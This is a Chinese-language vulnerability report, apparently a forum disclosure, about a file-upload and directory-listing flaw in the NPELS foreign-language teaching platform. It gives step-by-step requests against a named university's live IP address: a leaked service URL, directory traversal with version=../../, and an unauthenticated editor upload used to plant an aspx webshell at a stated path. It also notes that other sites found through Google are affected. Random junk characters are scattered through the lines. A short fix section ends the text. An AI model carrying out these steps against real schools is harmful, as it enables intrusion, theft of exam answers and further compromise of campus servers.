新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

详细说明：
8 Z  P$ `& k' V; [% T/ M- y
$ W/ q( l- F% M以南开大学的为例:
/ r0 O; j# Q& G9 W$ y7 J5 Yhttp://222.30.60.3/NPELS
; F/ T. Z8 ~8 E% {' z1 S3 bNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
: q: m! x1 g2 E& p3 x% i<setting name="Update_CommonSvr_CommonService" serializeAs="String">
" r3 b& U, j; W+ A0 n( ^. @$ i! V  M<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
及版本号
- h  V5 ^" E& j% i% w  f. Y<add key="TVersion" value="1, 0, 0, 2187">
- x7 [6 F4 M3 I" d5 x</add>
. D6 c% V, ?( ~" @1 p直接访问
6 ]$ |9 O4 _/ o% Y! J6 G! phttp://222.30.60.3/NPELS/CommonService.asmx
  Z- ^( U& p2 v( a( r/ D4 V% ?使用GetTestClientFileList操作，直接 HTTP GET 列目录：
6 P8 r) o: ]2 f. u4 f. L! ?" Xhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
, i7 F! J6 L4 {4 Q  Yhttp://222.30.60.3/NPELS/CommonS ... List?version=../../

" g# n4 S- Y  P' j发现
. J, W! Z& C/ p8 q) Thttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
; e% q0 h) S2 S上传后继续列目录找到木马地址直接访问即可
, _0 b5 O! S4 D
OOXX
  B5 }$ ]4 F: K; s
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：

2 u$ C: x1 q/ @5 L# K列目录：
- e6 J  l! X  ?  Vhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
) S8 ?8 h% f6 _: x7 f* P1 @文件上传：
http://222.30.60.3/npelsv/editor/editor.htm
" S4 |) ~3 ^9 B# E( l
! d( z# S' I4 h. X8 l7 q2 m上传木马：
) J& j, d' C$ ~8 Q: {1 Ahttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
) s2 Y5 T. j$ z3 e. a" `
8 o  w- d# a5 D3 w3 u( y6 A& d# y修复方案：
好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
$ u+ n! b9 V* B9 h7 Q1 A: h并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
  T5 C) O) W& K+ F7 b/ U  y